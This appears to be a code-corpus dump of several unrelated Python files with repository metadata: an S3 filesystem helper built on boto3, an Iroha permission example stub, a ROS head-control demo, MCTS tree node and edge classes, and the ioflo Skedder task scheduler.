@staticmethod
def get_session():
# Lazily load boto
import boto3
return boto3.Session()
@staticmethod
def matches_uri(uri: str, mode: str) -> bool:
parsed_uri = urlparse(uri)
return parsed_uri.scheme == 's3'
@staticmethod
def file_exists(uri: str) -> bool:
# Lazily load boto
import botocore
s3 = S3FileSystem.get_session().resource('s3')
parsed_uri = urlparse(uri)
bucket = parsed_uri.netloc
key = parsed_uri.path[1:]
try:
s3.Object(bucket, key).load()
except botocore.exceptions.ClientError as e:
return False
return True
@staticmethod
def read_str(uri: str) -> str:
return S3FileSystem.read_bytes(uri).decode('utf-8')
@staticmethod
def read_bytes(uri: str) -> bytes:
import botocore
s3 = S3FileSystem.get_session().client('s3')
parsed_uri = urlparse(uri)
with io.BytesIO() as file_buffer:
try:
s3.download_fileobj(parsed_uri.netloc, parsed_uri.path[1:],
file_buffer)
return file_buffer.getvalue()
except botocore.exceptions.ClientError as e:
raise NotReadableError('Could not read {}'.format(uri)) from e
@staticmethod
def write_str(uri: str, data: str) -> None:
data = bytes(data, encoding='utf-8')
S3FileSystem.write_bytes(uri, data)
@staticmethod
def write_bytes(uri: str, data: bytes) -> None:
s3 = S3FileSystem.get_session().client('s3')
parsed_uri = urlparse(uri)
bucket = parsed_uri.netloc
key = parsed_uri.path[1:]
with io.BytesIO(data) as str_buffer:
try:
s3.upload_fileobj(str_buffer, bucket, key)
except Exception as e:
raise NotWritableError('Could not write {}'.format(uri)) from e
@staticmethod
def sync_from_dir(src_dir_uri: str,
dest_dir_uri: str,
delete: bool = False) -> None: # pragma: no cover
command = ['aws', 's3', 'sync', src_dir_uri, dest_dir_uri]
if delete:
command.append('--delete')
subprocess.run(command)
@staticmethod
def sync_to_dir(src_dir_uri: str, dest_dir_uri: str,
delete: bool = False) -> None: # pragma: no cover
command = ['aws', 's3', 'sync', src_dir_uri, dest_dir_uri]
if delete:
command.append('--delete')
subprocess.run(command)
@staticmethod
def copy_to(src_path: str, dst_uri: str) -> None:
s3 = S3FileSystem.get_session().client('s3')
parsed_uri = urlparse(dst_uri)
if os.path.isfile(src_path):
try:
s3.upload_file(src_path, parsed_uri.netloc,
parsed_uri.path[1:])
except Exception as e:
raise NotWritableError(
'Could not write {}'.format(dst_uri)) from e
else:
S3FileSystem.sync_to_dir(src_path, dst_uri, delete=True)
@staticmethod
def copy_from(uri: str, path: str) -> None:
import botocore
s3 = S3FileSystem.get_session().client('s3')
parsed_uri = urlparse(uri)
try:
s3.download_file(parsed_uri.netloc, parsed_uri.path[1:], path)
except botocore.exceptions.ClientError:
raise NotReadableError('Could not read {}'.format(uri))
@staticmethod
def local_path(uri: str, download_dir: str) -> None:
parsed_uri = urlparse(uri)
path = os.path.join(download_dir, 's3', parsed_uri.netloc,
parsed_uri.path[1:])
return path
@staticmethod
def last_modified(uri: str) -> datetime:
parsed_uri = urlparse(uri)
bucket, key = parsed_uri.netloc, parsed_uri.path[1:]
s3 = S3FileSystem.get_session().client('s3')
head_data = s3.head_object(Bucket=bucket, Key=key)
return head_data['LastModified']
@staticmethod
def list_paths(uri, ext=''):
parsed_uri = urlparse(uri)
bucket = parsed_uri.netloc
prefix = os.path.join(parsed_uri.path[1:])
keys = get_matching_s3_keys(bucket, prefix, suffix=ext)
return [os.path.join('s3://', bucket, key) for key in keys]
| 3,770 | 639 | 23 |
6121daeffe4f654f25b1707e220d87cce2b7e556 | 249 | py | Python | example/python/permissions/can_transfer.py | akshatkarani/iroha | 5acef9dd74720c6185360d951e9b11be4ef73260 | [
"Apache-2.0"
] | 1,467 | 2016-10-25T12:27:19.000Z | 2022-03-28T04:32:05.000Z | example/python/permissions/can_transfer.py | akshatkarani/iroha | 5acef9dd74720c6185360d951e9b11be4ef73260 | [
"Apache-2.0"
] | 2,366 | 2016-10-25T10:07:57.000Z | 2022-03-31T22:03:24.000Z | example/python/permissions/can_transfer.py | akshatkarani/iroha | 5acef9dd74720c6185360d951e9b11be4ef73260 | [
"Apache-2.0"
] | 662 | 2016-10-26T04:41:22.000Z | 2022-03-31T04:15:02.000Z | #
# Copyright Soramitsu Co., Ltd. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
import can_receive
# Please see example for can_receive permission.
# By design can_receive and can_transfer permissions
# can be tested only together.
| 22.636364 | 52 | 0.779116 | #
# Copyright Soramitsu Co., Ltd. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
import can_receive
# Please see example for can_receive permission.
# By design can_receive and can_transfer permissions
# can be tested only together.
| 0 | 0 | 0 |
1a117e69ab35215f8f86142f15d32d060e0b9e3b | 1,232 | py | Python | cse481wi18/applications/scripts/head_demo.py | TimAdamson21/access_teleop | 4ca4cc3ebc29cb4942cec5c8e3e60b897b80590c | [
"MIT"
] | null | null | null | cse481wi18/applications/scripts/head_demo.py | TimAdamson21/access_teleop | 4ca4cc3ebc29cb4942cec5c8e3e60b897b80590c | [
"MIT"
] | null | null | null | cse481wi18/applications/scripts/head_demo.py | TimAdamson21/access_teleop | 4ca4cc3ebc29cb4942cec5c8e3e60b897b80590c | [
"MIT"
] | null | null | null | #! /usr/bin/env python
import rospy
import fetch_api
def wait_for_time():
"""Wait for simulated time to begin.
"""
while rospy.Time().now().to_sec() == 0:
pass
if __name__ == '__main__':
main()
| 23.692308 | 75 | 0.578734 | #! /usr/bin/env python
import rospy
import fetch_api
def print_usage():
print 'Usage:'
print ' rosrun applications head_demo.py look_at FRAME_ID X Y Z'
print ' rosrun applications head_demo.py pan_tilt PAN_ANG TILT_ANG'
print 'Examples:'
print ' rosrun applications head_demo.py look_at base_link 1 0 0.3'
print ' rosrun applications head_demo.py pan_tilt 0 0.707'
def wait_for_time():
"""Wait for simulated time to begin.
"""
while rospy.Time().now().to_sec() == 0:
pass
def main():
rospy.init_node('head_demo')
wait_for_time()
argv = rospy.myargv()
if len(argv) < 2:
print_usage()
return
command = argv[1]
head = fetch_api.Head()
if command == 'look_at':
if len(argv) < 6:
print_usage()
return
frame_id, x, y, z = argv[2], float(argv[3]), float(argv[4]), float(
argv[5])
head.look_at(frame_id, x, y, z)
elif command == 'pan_tilt':
if len(argv) < 4:
print_usage()
return
pan, tilt = float(argv[2]), float(argv[3])
head.pan_tilt(pan, tilt)
else:
print_usage()
if __name__ == '__main__':
main()
| 961 | 0 | 46 |
7669c07f7d4e2bfe8db49af295ec775218fd092b | 1,806 | py | Python | tree.py | captaincapsaicin/castle | fd0a042b5ca2aa017cdbe69688595f771bae8f59 | [
"MIT"
] | null | null | null | tree.py | captaincapsaicin/castle | fd0a042b5ca2aa017cdbe69688595f771bae8f59 | [
"MIT"
] | 1 | 2017-11-25T00:35:40.000Z | 2017-11-25T00:35:40.000Z | tree.py | captaincapsaicin/castle | fd0a042b5ca2aa017cdbe69688595f771bae8f59 | [
"MIT"
] | null | null | null |
def create_new_connection(parent_node, child_node, action, prior_probability):
"""
Returns the edge connecting parent and child
"""
edge = Edge(parent_node, child_node, action, prior_probability)
parent_node.add_outgoing_edge(edge)
child_node.add_incoming_edge(edge)
return edge
| 31.137931 | 119 | 0.633444 | class Node(object):
def __init__(self, state, outgoing_edges=None, in_edge=None):
self.state = state
if outgoing_edges is not None:
self.outgoing_edges = outgoing_edges
else:
self.outgoing_edges = []
self.in_edge = in_edge
self.is_expanded = False
self.is_terminal = False
def add_outgoing_edge(self, edge):
self.outgoing_edges.append(edge)
def add_outgoing_edges(self, edges):
self.outgoing_edges.extend(edges)
def add_incoming_edge(self, edge):
self.in_edge = edge
def __repr__(self):
return 'Node. Children: {} State: {}'.format([edge.out_node.state for edge in self.outgoing_edges], self.state)
class Edge(object):
def __init__(self,
in_node,
out_node,
action,
prior_probability,
num_visits=0,
total_action_value=0.0):
self.in_node = in_node
self.out_node = out_node # node
self.action = action
self.num_visits = num_visits
self.total_action_value = total_action_value
self.prior_probability = prior_probability
@property
def mean_action_value(self):
if self.num_visits == 0:
return 0.0
return self.total_action_value / self.num_visits
def __repr__(self):
return 'Edge. In: {} Out: {} Action: {}'.format(self.in_node.state, self.out_node.state, self.action)
def create_new_connection(parent_node, child_node, action, prior_probability):
"""
Returns the edge connecting parent and child
"""
edge = Edge(parent_node, child_node, action, prior_probability)
parent_node.add_outgoing_edge(edge)
child_node.add_incoming_edge(edge)
return edge
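# Usage sketch (illustrative, not part of the original module): link two nodes
# with create_new_connection and check the wiring it sets up.
def _demo_connection():
    root = Node(state='root')
    child = Node(state='child')
    edge = create_new_connection(root, child, action='a', prior_probability=0.5)
    return root.outgoing_edges[0] is edge and child.in_edge is edge  # True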
| 1,227 | 90 | 179 |
4d325da1cd3ad6f9e3e55cc011c11ddb5f61afbf | 16,093 | py | Python | ioflo/base/skedding.py | BradyHammond/ioflo | 177ac656d7c4ff801aebb0d8b401db365a5248ce | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 128 | 2015-01-14T12:26:56.000Z | 2021-11-06T07:09:29.000Z | ioflo/base/skedding.py | BradyHammond/ioflo | 177ac656d7c4ff801aebb0d8b401db365a5248ce | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 17 | 2015-01-28T18:26:50.000Z | 2020-11-19T22:08:06.000Z | ioflo/base/skedding.py | BradyHammond/ioflo | 177ac656d7c4ff801aebb0d8b401db365a5248ce | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 29 | 2015-01-27T23:28:31.000Z | 2021-05-04T16:37:30.000Z | """skedding.py weightless thread scheduling
"""
#print( "module {0}".format(__name__))
import sys
import os
import time
from collections import deque
from ..aid.consoling import getConsole
console = getConsole()
from ..aid.sixing import *
from ..aid import odict, oset
from .globaling import *
from ..aid import timing
from . import excepting
from . import registering
from . import storing
from . import tasking
from . import building
from ..__metadata__ import __version__
from ..aid.consoling import getConsole
console = getConsole()
class Skedder(object):
"""Schedules weightless tasker objects based on generators.
run method runs the skedder main loop until interrupted or all taskers
completed
taskers is a dictionary of taskers indexed by tasker name
The skedder maintains lists of taskers in various execution states
Each list determines what the skedder does with the tasker.
The skedder has methods that move taskers between the lists and
also notifies taskers of their control
Skedder runs tasker and sends it a control
Tasker runs using control and yields its status
Each tasker as a .desire attribute that indicates what the next
desired control should be.
Each tasker as a .period attribute that indicates how ofter the tasker
should be run
There are three deques the skedder maintains. Each entry in each deque
is a tuple (tasker, retime, period)
tasker is reference to tasker object
retime is time that the tasker should next be run
a retime of zero means runs asap or always
period is the time period between runs
ready = deque of tuples where taskers are ready to be run
If need different priorities then need to add a
ready list for each priority
stopped = deque of tuples where taskers stopped awaiting start
aborted = deque of tuples where taskers aborted can't be restarted
addStoppedTask(tasker) adds tasker to stopped list
addReadyTask(tasker) adds tasker to ready list
Every time a tasker runs it yields a status that the skedder uses to determine
what to do with the tasker
instance attributes:
.name = skedder name string
.period = time seconds between iterations of skedder
.stamp = current iteration time of skedder
.real = real time IF True ELSE simulated time
.timer = timer to time loops in real time
.elapsed = timer to time elapsed in mission
.houses = list of houses to be scheduled
.ready = deque of tasker tuples ready to run
.aborted = deque of tasker tuples aborted
"""
def __init__( self,
name="skedder",
period=0.125,
stamp=0.0,
real=False,
retro=True,
filepath='',
behaviors=None,
username='',
password='',
mode=None,
houses=None,
metas=None,
preloads=None, ):
"""
Initialize Skedder instance.
parameters:
name = name string
period = iteration period
stamp = initial time stamp value
real = time mode real time True or simulated time False
retro = shift timers if retrograded system clock detected
filepath = filepath to build file
behaviors = list of pathnames to packages with external behavior modules
username = username
password = password
mode = parsing mode
houses = list of houses
metas = list of triples of (name, path, data) where
name = name string of house attribute, path = path string, data = odict
preloads = list of duples of (path, data) to preload Store where
path = path string, data = odict
"""
self.name = name
self.period = float(abs(period))
self.stamp = float(abs(stamp))
#real time or sim time mode
self.real = True if real else False
self.timer = timing.MonoTimer(duration = self.period, retro=retro)
self.elapsed = timing.MonoTimer(retro=retro)
self.filepath = os.path.abspath(filepath)
self.plan = os.path.split(self.filepath)[1]
self.behaviors = behaviors or []
self.username = username
self.password = password
self.mode = mode or []
self.houses = houses or []
#Meta data format is list of triples of form (name, path, value)
self.metas = [
("name", "meta.name", odict(value=self.name)),
("period", "meta.period", odict(value=self.period)),
("real", "meta.real", odict(value=self.real)),
("mode", "meta.mode", odict(value=self.mode)), #applied mode logging only
("plan", "meta.plan", odict(value=self.plan)),
("filepath", "meta.filepath", odict(value=self.filepath)),
("behaviors", "meta.behaviors", odict(value=self.behaviors)),
("credentials", "meta.credentials",
odict([('username', self.username), ('password', self.password)])),
("failure", "meta.failure", odict(value="")), # for failure reporting
("framers", "meta.framers", odict()), # for failure reporting
("taskables", "meta.taskables", odict(value=oset())), # to add taskables at runtime ordered
]
if metas:
self.metas.extend(metas)
self.preloads = [
("ioflo.version", odict(value=__version__)),
("ioflo.platform",
odict([("os", sys.platform),
("python", "{0}.{1}.{2}".format(*sys.version_info)),] )),
]
if preloads:
self.preloads.extend(preloads)
self.ready = deque() # deque of taskers in run order
self.aborted = deque() # deque of aborted taskers
self.built = False # True when successfully built
def addReadyTask(self, tasker):
"""
Prepare tasker to be started and add to ready list
"""
if tasker.schedule == ACTIVE:
tasker.desire = START
else:
tasker.desire = STOP
tasker.status = STOPPED
retime = tasker.store.stamp
period = tasker.period
trp = (tasker, retime, period)
self.ready.append(trp)
console.profuse(" Add ready: {0} retime: {1} period: {2} desire {3}\n".format(
tasker.name, retime, period, ControlNames[tasker.desire]))
def build(self, filepath='', mode=None, metas=None, preloads=None):
""" Build houses from file given by filepath """
console.terse("Building Houses for Skedder '{0}' ...\n".format(self.name))
self.built = False
#use parameter otherwise use inited value
if filepath:
self.filepath = filepath
if mode:
self.mode.extend(mode)
if metas:
self.metas.extend(metas)
if preloads:
self.preloads.extend(preloads)
b = building.Builder(fileName = self.filepath,
mode=self.mode,
metas = self.metas,
preloads =self.preloads,
behaviors=self.behaviors)
if not b.build():
return False
self.built = True
self.houses = b.houses
for house in self.houses:
console.profuse("Meta Data for House '{0}':\n{1}\n".format(
house.name, house.metas))
return True
def run(self, growable=False):
"""runs all generator taskers in running list by calling next() method.
Keyboard interrupt (cntl-c) to end forever loop
Since finally clause closes taskers they must be restarted before
run can be executed again
if growable is True then allow adding new taskers at runtime
via house metas['taskables']
"""
console.terse("Starting Skedder '{0}' ...\n".format(self.name))
stamp = self.stamp
for house in self.houses:
house.store.changeStamp(stamp)
console.profuse("Initialized store {0}: stamp = {1} with {2}\n".format(
house.store.name, house.store.stamp, stamp)) # was a bare expression that never logged anything; send it to the console instead
for tasker in house.taskables:
self.addReadyTask(tasker)
console.profuse("Ready Taskers: {0}\n".format(
', '.join([tasker.name for tasker,r,p in self.ready])))
console.profuse("Aborted Taskers: {0}\n".format(
', '.join([tasker.name for tasker,r,p in self.aborted])))
self.timer.restart()
self.elapsed.restart()
#make local reference for speed put out side loop?
ready = self.ready
#stopped = self.stopped
aborted = self.aborted
try: #so always clean up resources if exception
while True:
try: #CNTL-C generates keyboardInterrupt to break out of while loop
console.profuse("\nRunning Skedder '{0}' at stamp = {1} real elapsed = {2:0.4f}\n".format(
self.name, self.stamp, self.elapsed.elapsed))
more = False #are any taskers RUNNING or STARTED
for i in range(len(ready)): #attempt to run each ready tasker
tasker, retime, period = ready.popleft() #pop it off
if retime > stamp: #not time yet
ready.append((tasker, retime, period)) #reappend it
status = tasker.status
else: #run it
try:
status = tasker.runner.send(tasker.desire)
if status == ABORTED: #aborted so abort tasker
aborted.append((tasker, stamp, period))
console.profuse(" Tasker Self Aborted: {0}\n".format(tasker.name))
else:
ready.append((tasker,
retime + tasker.period,
tasker.period)) # append allows for period change
except StopIteration: #generator returned instead of yielded
aborted.append((tasker, stamp, period))
console.profuse(" Tasker Aborted due to StopIteration: {0}\n".format(tasker.name))
if status == RUNNING or status == STARTED:
more = True
if growable:
# todo from each house.metas fetch new taskables
# add to ready
pass
if not ready: #no pending taskers so done
console.terse("No ready taskers. Shutting down skedder ...\n")
break
if not more: #all taskers stopped or aborted
console.terse("No running or started taskers. Shutting down skedder ...\n")
break
#update time stamps
if self.real:
console.profuse(" Time remaining skedder = {0:0.4f}\n".format(self.timer.remaining))
while not self.timer.expired:
time.sleep(self.timer.remaining)
self.timer.repeat()
self.stamp += self.period
stamp = self.stamp
for house in self.houses:
house.store.changeStamp(stamp)
except KeyboardInterrupt: #CNTL-C shutdown skedder
console.terse("KeyboardInterrupt forcing shutdown of Skedder ...\n")
break
except SystemExit: #User knows why shutting down
console.terse("SystemExit forcing shutdown of Skedder ...\n")
raise
except Exception: #Let user know what exception caused shutdown
console.terse("Surprise exception forcing shutdown of Skedder ...\n")
raise
console.terse("Total elapsed real time = {0:0.4f}\n".format(self.elapsed.elapsed))
finally: #finally clause always runs regardless of exception or not
#Abort any running taskers to reclaim resources
#Stopped or aborted taskers should have already released resources
#if last run tasker exited due to exception then try finally clause in
#its generator is responsible for releasing resources
console.terse("Aborting all ready Taskers ...\n")
for i in range(len(ready)): #run each ready tasker once
tasker,retime,period = ready.popleft() #pop it off
try:
status = tasker.runner.send(ABORT)
console.terse("Tasker '{0}' aborted\n".format(tasker.name))
except StopIteration: #generator returned instead of yielded
console.terse("Tasker '{0}' generator already exited\n".format(tasker.name))
#tasker.runner.close() #kill generator
if console._verbosity >= console.Wordage.concise:
for house in self.houses:
#show store hierarchy
console.concise( "\nData Store for {0}\n".format(house.name))
house.store.expose(valued=(console._verbosity >= console.Wordage.terse))
def Test(real = False, verbose = False):
"""Module Common self test
"""
import housing
reload(housing)
housing.ClearRegistries()
print(housing.Registries)
print("")
print(housing.Registries["tasker"].Names)
print(housing.Registries["tasker"].Counter)
print("")
house = housing.House()
t1 = tasking.Tasker(name = 't1', store = house.store)
t2 = tasking.Tasker(name = 't2', store = house.store)
t3 = tasking.Tasker(name = 't3', store = house.store, period = 0.125)
t4 = tasking.Tasker(name = 't4', store = house.store, period = 0.125)
t5 = tasking.Tasker(name = 't5', store = house.store, period = 0.5)
t6 = tasking.Tasker(name = 't6', store = house.store, period = 1.0)
house.actives = [t1,t6,t2,t5,t3,t4]
skedder = Skedder(name = "TestTasker", period = 0.125, real = real, houses = [house])
skedder.run()
def TestProfile(real = False, verbose = False):
"""Module Common self test
"""
import cProfile
import pstats
import housing
reload(housing)
housing.ClearRegistries()
print(housing.Registries)
print("")
print(housing.Registries["tasker"].Names)
print(housing.Registries["tasker"].Counter)
print("")
house = housing.House()
t1 = Tasker(name = 't1', store = house.store)
t2 = Tasker(name = 't2', store = house.store)
t3 = Tasker(name = 't3', store = house.store, period = 0.125)
t4 = Tasker(name = 't4', store = house.store, period = 0.125)
t5 = Tasker(name = 't5', store = house.store, period = 0.5)
t6 = Tasker(name = 't6', store = house.store, period = 1.0)
house.actives = [t1,t6,t2,t5,t3,t4]
skedder = Skedder(name = "TestSkedder", period = 0.125, real = real, houses = [house])
#skedder.run()
cProfile.runctx('skedder.run()',globals(),locals(), './test/profiles/skeddertest')
p = pstats.Stats('./test/profiles/skeddertest')
p.sort_stats('time').print_stats()
p.print_callers()
p.print_callees()
if __name__ == "__main__":
Test()
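# --- Editor's note (added): an illustrative sketch, not part of ioflo. It mirrors the
# --- (tasker, retime, period) bookkeeping described in the Skedder docstring with plain
# --- data so it needs no House/Tasker/Store; the names and periods below are invented.
def _example_ready_deque_policy():
    """Show how due entries are run and re-queued at retime + period, while others wait."""
    ready = deque([("taskerA", 0.0, 0.125), ("taskerB", 0.5, 0.5)])
    stamp = 0.0
    ran = []
    for _ in range(len(ready)):
        tasker, retime, period = ready.popleft()
        if retime > stamp:                              # not due yet: re-append unchanged
            ready.append((tasker, retime, period))
        else:                                           # due: "run" it and schedule its next slot
            ran.append(tasker)
            ready.append((tasker, retime + period, period))
    return ran, list(ready)  # (['taskerA'], [('taskerA', 0.125, 0.125), ('taskerB', 0.5, 0.5)])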
| 37.600467 | 118 | 0.563723 | """skedding.py weightless thread scheduling
"""
#print( "module {0}".format(__name__))
import sys
import os
import time
from collections import deque
from ..aid.consoling import getConsole
console = getConsole()
from ..aid.sixing import *
from ..aid import odict, oset
from .globaling import *
from ..aid import timing
from . import excepting
from . import registering
from . import storing
from . import tasking
from . import building
from ..__metadata__ import __version__
from ..aid.consoling import getConsole
console = getConsole()
class Skedder(object):
"""Schedules weightless tasker objects based on generators.
run method runs the skedder main loop until interrupted or all taskers
completed
taskers is a dictionary of taskers indexed by tasker name
The skedder maintains lists of taskers in various execution states
Each list determines what the skedder does with the tasker.
The skedder has methods that move taskers between the lists and
also notifies taskers of their control
Skedder runs tasker and sends it a control
Tasker runs using control and yields its status
Each tasker has a .desire attribute that indicates what the next
desired control should be.
Each tasker has a .period attribute that indicates how often the tasker
should be run
There are three deques the skedder maintains. Each entry in each deque
is a tuple (tasker, retime, period)
tasker is reference to tasker object
retime is time that the tasker should next be run
a retime of zero means runs asap or always
period is the time period between runs
ready = deque of tuples where taskers are ready to be run
If need different priorities then need to add a
ready list for each priority
stopped = deque of tuples where taskers stopped awaiting start
aborted = deque of tuples where taskers aborted can't be restarted
addStoppedTask(tasker) adds tasker to stopped list
addReadyTask(tasker) adds tasker to ready list
Every time a tasker runs it yields a status that the skedder uses to determine
what to do with the tasker
instance attributes:
.name = skedder name string
.period = time seconds between iterations of skedder
.stamp = current iteration time of skedder
.real = real time IF True ELSE simulated time
.timer = timer to time loops in real time
.elapsed = timer to time elapsed in mission
.houses = list of houses to be scheduled
.ready = deque of tasker tuples ready to run
.aborted = deque of tasker tuples aborted
"""
def __init__( self,
name="skedder",
period=0.125,
stamp=0.0,
real=False,
retro=True,
filepath='',
behaviors=None,
username='',
password='',
mode=None,
houses=None,
metas=None,
preloads=None, ):
"""
Initialize Skedder instance.
parameters:
name = name string
period = iteration period
stamp = initial time stamp value
real = time mode real time True or simulated time False
retro = shift timers if retrograded system clock detected
filepath = filepath to build file
behaviors = list of pathnames to packages with external behavior modules
username = username
password = password
mode = parsing mode
houses = list of houses
metas = list of triples of (name, path, data) where
name = name string of house attribute, path = path string, data = odict
preloads = list of duples of (path, data) to preload Store where
path = path string, data = odict
"""
self.name = name
self.period = float(abs(period))
self.stamp = float(abs(stamp))
#real time or sim time mode
self.real = True if real else False
self.timer = timing.MonoTimer(duration = self.period, retro=retro)
self.elapsed = timing.MonoTimer(retro=retro)
self.filepath = os.path.abspath(filepath)
self.plan = os.path.split(self.filepath)[1]
self.behaviors = behaviors or []
self.username = username
self.password = password
self.mode = mode or []
self.houses = houses or []
#Meta data format is list of triples of form (name, path, value)
self.metas = [
("name", "meta.name", odict(value=self.name)),
("period", "meta.period", odict(value=self.period)),
("real", "meta.real", odict(value=self.real)),
("mode", "meta.mode", odict(value=self.mode)), #applied mode logging only
("plan", "meta.plan", odict(value=self.plan)),
("filepath", "meta.filepath", odict(value=self.filepath)),
("behaviors", "meta.behaviors", odict(value=self.behaviors)),
("credentials", "meta.credentials",
odict([('username', self.username), ('password', self.password)])),
("failure", "meta.failure", odict(value="")), # for failure reporting
("framers", "meta.framers", odict()), # for failure reporting
("taskables", "meta.taskables", odict(value=oset())), # to add taskables at runtime ordered
]
if metas:
self.metas.extend(metas)
self.preloads = [
("ioflo.version", odict(value=__version__)),
("ioflo.platform",
odict([("os", sys.platform),
("python", "{0}.{1}.{2}".format(*sys.version_info)),] )),
]
if preloads:
self.preloads.extend(preloads)
self.ready = deque() # deque of taskers in run order
self.aborted = deque() # deque of aborted taskers
self.built = False # True when successfully built
def addReadyTask(self, tasker):
"""
Prepare tasker to be started and add to ready list
"""
if tasker.schedule == ACTIVE:
tasker.desire = START
else:
tasker.desire = STOP
tasker.status = STOPPED
retime = tasker.store.stamp
period = tasker.period
trp = (tasker, retime, period)
self.ready.append(trp)
console.profuse(" Add ready: {0} retime: {1} period: {2} desire {3}\n".format(
tasker.name, retime, period, ControlNames[tasker.desire]))
def build(self, filepath='', mode=None, metas=None, preloads=None):
""" Build houses from file given by filepath """
console.terse("Building Houses for Skedder '{0}' ...\n".format(self.name))
self.built = False
#use parameter otherwise use inited value
if filepath:
self.filepath = filepath
if mode:
self.mode.extend(mode)
if metas:
self.metas.extend(metas)
if preloads:
self.preloads.extend(preloads)
b = building.Builder(fileName = self.filepath,
mode=self.mode,
metas = self.metas,
preloads =self.preloads,
behaviors=self.behaviors)
if not b.build():
return False
self.built = True
self.houses = b.houses
for house in self.houses:
console.profuse("Meta Data for House '{0}':\n{1}\n".format(
house.name, house.metas))
return True
def run(self, growable=False):
"""runs all generator taskers in running list by calling next() method.
Keyboard interrupt (cntl-c) to end forever loop
Since finally clause closes taskers they must be restarted before
run can be executed again
if growable is True then allow adding new taskers at runtime
via house metas['taskables']
"""
console.terse("Starting Skedder '{0}' ...\n".format(self.name))
stamp = self.stamp
for house in self.houses:
house.store.changeStamp(stamp)
console.profuse("Initialized store {0}: stamp = {1} with {2}\n".format(
house.store.name, house.store.stamp, stamp)) # was a bare expression that never logged anything; send it to the console instead
for tasker in house.taskables:
self.addReadyTask(tasker)
console.profuse("Ready Taskers: {0}\n".format(
', '.join([tasker.name for tasker,r,p in self.ready])))
console.profuse("Aborted Taskers: {0}\n".format(
', '.join([tasker.name for tasker,r,p in self.aborted])))
self.timer.restart()
self.elapsed.restart()
#make local reference for speed put out side loop?
ready = self.ready
#stopped = self.stopped
aborted = self.aborted
try: #so always clean up resources if exception
while True:
try: #CNTL-C generates keyboardInterrupt to break out of while loop
console.profuse("\nRunning Skedder '{0}' at stamp = {1} real elapsed = {2:0.4f}\n".format(
self.name, self.stamp, self.elapsed.elapsed))
more = False #are any taskers RUNNING or STARTED
for i in range(len(ready)): #attempt to run each ready tasker
tasker, retime, period = ready.popleft() #pop it off
if retime > stamp: #not time yet
ready.append((tasker, retime, period)) #reappend it
status = tasker.status
else: #run it
try:
status = tasker.runner.send(tasker.desire)
if status == ABORTED: #aborted so abort tasker
aborted.append((tasker, stamp, period))
console.profuse(" Tasker Self Aborted: {0}\n".format(tasker.name))
else:
ready.append((tasker,
retime + tasker.period,
tasker.period)) # append allows for period change
except StopIteration: #generator returned instead of yielded
aborted.append((tasker, stamp, period))
console.profuse(" Tasker Aborted due to StopIteration: {0}\n".format(tasker.name))
if status == RUNNING or status == STARTED:
more = True
if growable:
# todo from each house.metas fetch new taskables
# add to ready
pass
if not ready: #no pending taskers so done
console.terse("No ready taskers. Shutting down skedder ...\n")
break
if not more: #all taskers stopped or aborted
console.terse("No running or started taskers. Shutting down skedder ...\n")
break
#update time stamps
if self.real:
console.profuse(" Time remaining skedder = {0:0.4f}\n".format(self.timer.remaining))
while not self.timer.expired:
time.sleep(self.timer.remaining)
self.timer.repeat()
self.stamp += self.period
stamp = self.stamp
for house in self.houses:
house.store.changeStamp(stamp)
except KeyboardInterrupt: #CNTL-C shutdown skedder
console.terse("KeyboardInterrupt forcing shutdown of Skedder ...\n")
break
except SystemExit: #User knows why shutting down
console.terse("SystemExit forcing shutdown of Skedder ...\n")
raise
except Exception: #Let user know what exception caused shutdown
console.terse("Surprise exception forcing shutdown of Skedder ...\n")
raise
console.terse("Total elapsed real time = {0:0.4f}\n".format(self.elapsed.elapsed))
finally: #finally clause always runs regardless of exception or not
#Abort any running taskers to reclaim resources
#Stopped or aborted taskers should have already released resources
#if last run tasker exited due to exception then try finally clause in
#its generator is responsible for releasing resources
console.terse("Aborting all ready Taskers ...\n")
for i in range(len(ready)): #run each ready tasker once
tasker,retime,period = ready.popleft() #pop it off
try:
status = tasker.runner.send(ABORT)
console.terse("Tasker '{0}' aborted\n".format(tasker.name))
except StopIteration: #generator returned instead of yielded
console.terse("Tasker '{0}' generator already exited\n".format(tasker.name))
#tasker.runner.close() #kill generator
if console._verbosity >= console.Wordage.concise:
for house in self.houses:
#show store hierarchy
console.concise( "\nData Store for {0}\n".format(house.name))
house.store.expose(valued=(console._verbosity >= console.Wordage.terse))
def Test(real = False, verbose = False):
"""Module Common self test
"""
import housing
reload(housing)
housing.ClearRegistries()
print(housing.Registries)
print("")
print(housing.Registries["tasker"].Names)
print(housing.Registries["tasker"].Counter)
print("")
house = housing.House()
t1 = tasking.Tasker(name = 't1', store = house.store)
t2 = tasking.Tasker(name = 't2', store = house.store)
t3 = tasking.Tasker(name = 't3', store = house.store, period = 0.125)
t4 = tasking.Tasker(name = 't4', store = house.store, period = 0.125)
t5 = tasking.Tasker(name = 't5', store = house.store, period = 0.5)
t6 = tasking.Tasker(name = 't6', store = house.store, period = 1.0)
house.actives = [t1,t6,t2,t5,t3,t4]
skedder = Skedder(name = "TestTasker", period = 0.125, real = real, houses = [house])
skedder.run()
def TestProfile(real = False, verbose = False):
"""Module Common self test
"""
import cProfile
import pstats
import housing
reload(housing)
housing.ClearRegistries()
print(housing.Registries)
print("")
print(housing.Registries["tasker"].Names)
print(housing.Registries["tasker"].Counter)
print("")
house = housing.House()
t1 = Tasker(name = 't1', store = house.store)
t2 = Tasker(name = 't2', store = house.store)
t3 = Tasker(name = 't3', store = house.store, period = 0.125)
t4 = Tasker(name = 't4', store = house.store, period = 0.125)
t5 = Tasker(name = 't5', store = house.store, period = 0.5)
t6 = Tasker(name = 't6', store = house.store, period = 1.0)
house.actives = [t1,t6,t2,t5,t3,t4]
skedder = Skedder(name = "TestSkedder", period = 0.125, real = real, houses = [house])
#skedder.run()
cProfile.runctx('skedder.run()',globals(),locals(), './test/profiles/skeddertest')
p = pstats.Stats('./test/profiles/skeddertest')
p.sort_stats('time').print_stats()
p.print_callers()
p.print_callees()
if __name__ == "__main__":
Test()
| 0 | 0 | 0 |
6bbb09399af12973f203e06cfe0dab224ca66d09 | 6,549 | py | Python | fuel-package-updates.py | artem-panchenko/fuel-updates | 87abddfeae749ee81c58328410f842ccd9afe3dc | [
"Apache-2.0"
] | null | null | null | fuel-package-updates.py | artem-panchenko/fuel-updates | 87abddfeae749ee81c58328410f842ccd9afe3dc | [
